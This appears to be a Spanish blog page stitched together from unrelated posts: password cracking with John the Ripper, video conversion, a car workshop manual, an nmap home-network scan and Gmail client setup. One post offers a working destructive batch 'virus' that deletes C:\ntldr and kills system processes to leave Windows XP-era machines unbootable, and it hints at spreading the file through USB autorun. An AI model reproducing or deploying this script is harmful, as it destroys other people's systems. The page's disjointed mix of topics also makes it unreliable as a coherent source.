El programa permite romper bastantes encriptaciones actuales, pero como es lógico el ataque por fuerza bruta una clave de mas de 5 caracteres puede tardar bastante tiempo en descifrarlo

En mi caso he probado en una maquina virtual con Ubuntu 8.04 a romper las claves de los usuarios, lo primero que tenemos que hacer es instalarlo, bien lo descargamos de su web oficial o si estamos en linux podemos instalarlo mediante el uso de consola utilizando los comandos

sudo apt-get install john

Una vez que lo tenemos instalado procedemos a introducir el comando con sus parámetros, aunque en mi caso antes voy a volcar mis claves de usuario (encriptadas) en un archivo de texto por si nos cargáramos algo no meter la pata en el sistema, para ello introduzco.

sudo unshadow /etc/passwd /etc/shadow > misclaves

Una vez que tenemos las claves exportadas en el archivo misclaves, tenemos que comenzar con el ataque yo voy a dejar a John que haga el trabajo automáticamente para obtener las claves así que el comando es

jhon misclaves

Con este ultimo comando empezará la búsqueda de la clave y en muy poco tiempo ha conseguido descifrar la contraseña de los usuarios codificada en MD5, eso si han sido claves muy fáciles o basadas en el nombre de usuario. Os dejo una captura para que le deis un vistazo.

Lo primero que debemos de hacer es descargar el software de su página oficial para el sistema operativo que tengamos instalado en nuestra máquina, luego lo instalamos y nos aparecerá la ventana principal del programa

Como ves el software viene en su mayoría en español por lo que no tendrás problema a la hora de configurarlo, para empezar debemos de añadir los archivos que queramos convertir mediante la opción ”Añadir” una vez añadidos aparecerán en la lista, luego en la parte de abajo aparece “Convertir a” con esto podremos elegir el formato de salida en este caso he optado por MPEG-4 / H.264 aunque posee otros muy interesantes como WebM de Google, ya es cuestión de ir probando el que mas te guste.

Cuando creamos que es el adecuado podemos darle a vista preliminar y nos creará un trocito de vídeo ya procesado para que veamos el resultado y si te convence debes de darle a “Convertir” para que comience el proceso, dependiendo de la duración del vídeo, peso, calidad y velocidad del equipo tardará mas o menos.

Como he comentado arriba el software permite el procesado utilizando varios hilos del procesador lo que lo hace muy interesante en equipos con más de un núcleo (hoy en día casi todos) para activar esta interesante característica debemos entrar en “Editar” / “Preferencias” nos aparecerá la siguiente ventana.

Tenemos que marcar la casilla “Usar codificación de varios hilos” y poner el numero de hilos que tiene vuestro microprocesador, en mi caso es un Intel i5 650 que posee dos núcleos y 4 hilos esta información podéis sacarla de la web del fabricante de vuestro micro. También os digo que esta opción no está disponible en todos los formatos, por ejemplo el famoso WebM de Google no permite la codificación a varios hilos.

Como todo aparato necesita su mantenimiento y más cuando ya tienen esta edad, por eso os paso el manual de taller por si eres aficionado a la mecánica o deseas darle un vistazo.

El Rover 200 se fabricó desde 1989 hasta 1995 Recordad que este coche monta un motor Honda, que va muy fino y responde rápido. Lo que es bastante ruidoso a grandes velocidades, pero creo que es una cosa secundaria en un coche deportivo. Un dato de interés es que este coche compartía chasis y diseño con el Honda Concerto, se fabricaron los dos en la misma fabrica y eran primos hermanos.

Descargar Manual de Taller  6,82MB en ZIP

Por los años 90 este era un coche deportivo y con sus pequeños lujos, como cierre centralizado, inyección, elevalunas eléctricos y una cosa tiene muy curiosa es una especie de lunetas térmicas en los espejos retrovisores para evitar que se empañen. Ya por último os dejo con varios anuncios de la epoca.

Click here to view the video on YouTube.

Click here to view the video on YouTube.

El programa que utilizamos lo puedes encontrar en Google Play se llama Multitouch Visible Test es gratuito y pesa 11kb, este programa se nos carga a pantalla completa y tocando la pantalla con los dedos que queramos podremos ver la reacción de la misma.

Click here to view the video on YouTube.

Como os dije en un post anterior esto es posible a todos vosotros/as que utilizáis el programa a menudo y que seguro que recomendáis a vuestros amigos y familiares, desde aquí aprovecho para pediros que compartáis el programa por las redes sociales.

Este es el diploma, que por supuesto tengo enmarcado!

Y el trofeo realizado en metacrilato

Detalle de la serigrafía

Pues esto es todo, también tengo que decir que me mandaron un pendrive grabado de scenebeta y unas pegatinas !!

Que quede claro que mi intención no es que vayáis por hay cargándose los equipos de la gente, empresas y demás que os conozco… y cómo no podía ser de otra forma los daños provocados por la ejecución del script o por el intento… NO me hago responsable!! cada uno sois conscientes de lo que estáis haciendo y que el equipo quedará inservible a no ser que se reponga el archivo o se formatee.

Empezamos… Cabe destacar que este “virus” solamente es funcional en Windows 2000, Windows XP y Windows 2003 aunque con alguna modificación es posible aplicarlo a Vista y 7, básicamente lo que hace el archivo de procesamiento por lotes es eliminar el archivo ntldr que es necesario para que Windows arranque correctamente (los sistemas NT 5.X) y al no estar protegido con ningún sistema de permisos es realmente fácil eliminarlo al aplicar este “virus” el equipo no iniciará mostrando un mensaje “Falta NTLDR“

Veamos cómo hacerlo:  El código es el siguiente y debemos meterlo en un archivo.bat se puede hacer con cualquier editor de texto simple como el bloq de notas

@echo off
color 06
attrib -r -h -s %root:C:\ntldr
DEL /f /q "C:\ntldr"
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
cls
echo  error #800889xC888
exit

Lo que hacemos en esta línea es cambiar los atributos de este archivo para que podamos eliminarlo con el comando DEL

attrib -r -h -s %root:C:\ntldr

El comando DEL con los parámetros f y q lo que hace es eliminar el archivo ntldr forzando su eliminación y evitando que pregunte si quieres eliminarlo

DEL /f /q "C:\ntldr"

Seguidamente para que el efecto sea instantáneo lo que hacemos es “matar” varios procesos críticos del sistema, provocando con esto que el equipo se desestabilice y sea reiniciado sin poder hacer nada

taskkill /f /im explorer.exe
taskkill /f /im svchost.exe

Las siguientes lineas son para limpiar el contenido rápidamente y que el usuario no le de tiempo de ver que archivos han sido eliminados.

Este es el virus cree hace algún tiempo y decidido compartirlo con todo el mundo, no es que sea nada del otro mundo pero como curiosidad pues está bien. Aunque esto combinado con un autorun.inf en un pendrive la podéis liar y bien… pero no os quiero dar ideas

¿Sabías que las impresoras tienen un chip que cuenta las impresiones? cómo por ejemplo las impresoras que hace ya algún tiempo os enseñamos a desbloquearlas.

¿Sabías que las bombillas están diseñadas para durar menos de 1000 horas, cuando podrían durar más de 100 años en mancera.org también te lo comentábamos.

The video cannot be shown at the moment. Please try again later.

Por cierto, feliz 2012 !!

En mi caso he utilizado Linux Mint, pero se puede utilizar cualquier otra distro (está claro que si utilizamos Open Suse no podremos utilizar el apt-get para instalar los programas). Lo primero he de decir que en Linux cómo es normal en casi todas las tareas son menos  gráficas y por lo cual menos amigable… pero esa es la esencia de Linux, la terminal.

Lo más importante es tener claro que equipos tenemos conectados a nuestra red (móvil, tablet, consola…) y que IP tienen para que no creamos en falsos positivos, también es aconsejable ver en que red trabajamos. Una vez que tenemos todo apuntado procederemos a instalar en el equipo la herramienta de red nmap, es una de las herramientas más potentes en cuanto  análisis de redes en Linux y tiene gran cantidad de parámetros, un día de estos dedicare otro post a esta herramienta.

sudo apt-get update && sudo apt-get install nmap

Cuando terminemos la instalación debemos asegurarnos la red en la que trabajamos, el comando ifconfig nos lo mostrará. En mi caso la ip que tengo asignada es la 192.168.1.34 así que estoy en la red 192.168.1.0 con la máscara de subred 255.255.255.0 que de forma canónica sería /24

El siguiente comando que pondremos será para comenzar con el escaneo en la red indicada.

nmap 192.168.1.0/24

Esperamos un poco y veremos lo siguiente:

Cómo podemos ver nos ha encontrado dos host up (que  están actualmente conectados), pero en realidad es solo uno puesto que el primero con IP 192.168.1.1 es el router y el otro que aparece mas abajo con IP 192.168.1.34 es mi equipo, por lo cual  solamente hay un host(equipo) conectado a nuestra red.

Cómo podéis observar tambien se muestran los puertos abiertos de cada host, por lo que podríais realizar un ataque al vecino… bueno, paro que no quiero seguir dando ideas

Nos dirigimos a Configuración / Reenvío y correo POP/IMAP

 
Yo voy a utilizar el acceso mediante IMAP que tiene más ventajas (aunque también tengo activado el acceso por POP) y guardamos. Nos descargamos Thunderbird en su web, lo instalamos y nos pide que introduzcamos nuestro nombre, correo y contraseña.

Cuando pulsamos en continuar automáticamente el programa comienza a configurar todos los parámetros (servidor imap, smtp y puertos…) para nuestra cuenta.

Una vez pulsemos en crear cuenta comenzará a descargarse nuestro correo localmente.

Con eso ya tenemos configurado nuestro cliente, de todas formas os copio toda la configuración necesaria para Gmail.

En el caso de que no se configurase automáticamente tendríamos que utilizar los siguientes datos:

El servidor de correo entrante (IMAP) requiere SSL:	imap.gmail.com Usar SSL: Sí Puerto: 993
El servidor de correo saliente (SMTP) requiere TLS:	smtp.gmail.com(usar autenticación) Usar autenticación: Sí Usar STARTTLS: Sí (en algunos clientes se denomina SSL) Puerto: 465 ó 587
Nombre de cuenta:	tu nombre de usuario de Gmail (incluido @gmail.com)
Dirección de correo electrónico:	tu dirección de correo electrónico completa de Gmail (nombredeusuario@gmail.com)
Contraseña:	tu contraseña de Gmail